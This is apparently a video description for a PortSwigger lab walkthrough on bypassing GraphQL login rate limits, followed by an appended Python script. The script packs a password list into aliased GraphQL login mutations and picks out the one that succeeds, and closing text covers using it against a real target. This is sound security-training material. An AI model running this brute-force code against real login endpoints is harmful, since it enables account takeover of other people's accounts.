Bypassing GraphQL Brute Force Protections
Learn about GraphQL API vulnerabilities! The user login mechanism for this lab is powered by a GraphQL API. The API endpoint has a rate limiter that returns an error if it receives too many requests from the same origin in a short space of time. To solve the lab, we must brute-force the login mechanism to sign in as carlos.
If you're struggling with the concepts covered in this lab, please review:
PortSwigger challenge:
Sign up and start hacking right now -
Join our Discord -
This show is hosted by ( @_CryptoCat ) &
Do you want some Intigriti Swag? Check out
Overview:
0:00 Intro
0:25 Bypassing rate limiting using aliases
1:32 Lab: Bypassing GraphQL brute-force protections
2:00 Explore site functionality
2:37 Test brute-force protections
3:43 Set introspection query
4:02 Visualise schema
4:26 Save results to site map
4:44 Recap of intended exploit
5:14 Generate payload list
5:53 Exploit the vulnerability
6:42 Conclusion
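The alias technique the video walks through (chapter 0:25), as an added example that is not part of the original video or the lab material: a per-request rate limiter counts HTTP requests, but one GraphQL document may contain many fields of the same type as long as each gets a distinct alias, so a whole password list can be submitted as a single request. The mutation name `login`, its `input` argument and the returned `token`/`success` fields are assumptions chosen for illustration, not the lab's real schema; run an introspection query against the target (chapter 3:43) and substitute the real names. The sample response is constructed inline so the block runs offline.

```python
"""Pack many login attempts into one GraphQL request using aliases.

Added example for the "bypass rate limiting with aliases" technique.
Schema names (login / input / token / success) are ASSUMED for
illustration; confirm them with an introspection query first.
"""
import json
import re

# GraphQL names (including aliases) must match this grammar, otherwise the
# server rejects the whole document before any login is attempted.
GRAPHQL_NAME = re.compile(r"^[_A-Za-z][_0-9A-Za-z]*$")


def escape_graphql_string(value: str) -> str:
    """Quote a string for use as a GraphQL literal.

    GraphQL string literals use JSON escaping, so json.dumps yields a
    valid, safely quoted literal even for passwords containing quotes.
    """
    return json.dumps(value)


def build_aliased_login_query(username, passwords, mutation="login",
                              alias_prefix="attempt"):
    """Return one mutation document with one aliased field per password.

    Each alias (attempt0, attempt1, ...) maps back to the password at the
    same index in `passwords`, which is what find_successful_password uses.
    """
    if not GRAPHQL_NAME.match(alias_prefix):
        raise ValueError(f"invalid alias prefix: {alias_prefix!r}")
    lines = ["mutation {"]
    for i, password in enumerate(passwords):
        lines.append(
            f"  {alias_prefix}{i}: {mutation}(input: {{"
            f"username: {escape_graphql_string(username)}, "
            f"password: {escape_graphql_string(password)}}}) "
            "{ token success }"
        )
    lines.append("}")
    return "\n".join(lines)


def find_successful_password(response, passwords, alias_prefix="attempt"):
    """Map a parsed JSON response back to the password that logged in.

    Assumes each aliased result carries a boolean `success` field; returns
    None when no attempt in this batch succeeded.
    """
    data = response.get("data") or {}
    for i, password in enumerate(passwords):
        result = data.get(f"{alias_prefix}{i}")
        if result and result.get("success"):
            return password
    return None


def chunked(items, size):
    """Split the wordlist so no single request exceeds a server's alias cap."""
    for start in range(0, len(items), size):
        yield items[start:start + size]


# Constructed sample wordlist and a constructed response of the shape the
# (assumed) schema would return, with the fourth attempt succeeding.
PASSWORDS = ["123456", "password", "qwerty", 'let"me"in', "secret99"]
SAMPLE_RESPONSE = {
    "data": {
        "attempt0": {"token": "", "success": False},
        "attempt1": {"token": "", "success": False},
        "attempt2": {"token": "", "success": False},
        "attempt3": {"token": "c0n5truct3d", "success": True},
        "attempt4": {"token": "", "success": False},
    }
}


if __name__ == "__main__":
    for batch in chunked(PASSWORDS, 100):
        query = build_aliased_login_query("carlos", batch)
        # This is the JSON body you would POST to the /graphql endpoint
        # with Content-Type: application/json; no request is sent here.
        print(json.dumps({"query": query}, indent=2))
    print("hit:", find_successful_password(SAMPLE_RESPONSE, PASSWORDS))
```

When running this against a real target, send the body with Burp Repeater or any HTTP client and check the response for the alias whose result indicates success; if the server errors on the whole document, the mutation or field names are wrong, or the batch is larger than the server allows, so shrink the chunk size.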